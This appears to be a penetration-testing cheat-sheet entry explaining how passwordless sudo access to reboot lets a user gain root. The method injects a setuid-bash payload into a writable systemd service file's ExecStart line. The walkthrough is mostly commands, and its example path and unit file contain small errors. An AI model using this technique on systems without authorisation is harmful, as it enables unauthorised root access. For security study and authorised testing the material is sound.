Sudo Reboot Privilege Escalation

Last modified: 2023-02-05

Privilege Escalation

Sudo reboot commands might be vulnerable to privilege escalation (PrivEsc).


sudo -l

(ALL) NOPASSWD: /usr/sbin/reboot

If we can execute "reboot" command as root, we can escalate to privileges.


1. Find Service Config Files Which Are Writable

We need to look for the system service config file which are writable.

find / -writable -name "*.service" 2>/dev/null


2. Insert a Payload

If we find a writable file, we can inject a payload into Service.ExecStart.

# /etc/systemd/systm/example.service
Description=Zeno monitoring

ExecStart=/bin/bash -c 'cp /bin/bash /home/<username>/bash; chmod +xs /home/<username>/bash'


3. Reboot and Get a Root Shell

Now reboot as root.

sudo /usr/sbin/reboot

After the system rebooted, the command in the ExecStart will be executed.
Now we should get a root shell by executing the copied bash command.

/home/<username>/bash -p